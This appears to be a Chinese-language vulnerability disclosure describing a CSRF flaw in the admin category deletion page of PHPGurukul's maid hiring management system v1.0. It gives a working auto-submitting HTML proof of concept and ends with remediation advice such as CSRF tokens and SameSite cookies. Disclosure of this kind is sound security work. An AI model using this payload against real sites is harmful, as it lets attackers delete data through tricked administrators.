项目名称与仓库URL: 使用PHP和MySQL的家政招聘管理系统
漏洞类型: 客户端请求伪造
受影响版本: v1.0
💣漏洞描述: PHPGurukul 家政招聘管理系统的管理面板中存在跨站请求伪造(CSRF)漏洞,攻击者可通过诱骗已认证的管理员访问恶意网站,从而删除任意招聘分类。这可能导致数据被删除及未授权的管理员级别更改。
👩💻影响: 未授权的分类删除。
🛜漏洞验证(PoC):
存在一个分类删除功能,仅已认证的管理员可以删除分类。

用于向端点 /admin/manage-category.php 发送 GET 请求的 HTML 代码。
CSRF-POC
<html>
<body>
<form action="http://127.0.0.1/mhms/admin/manage-category.php">
<input type="hidden" name="delid" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
使用上述 HTML 代码构造恶意 URL。

管理员点击链接后,分类将被删除。

建议: 在管理表单中实施 CSRF 令牌,强制使用 SameSite Cookie,并验证请求来源以防止未授权操作。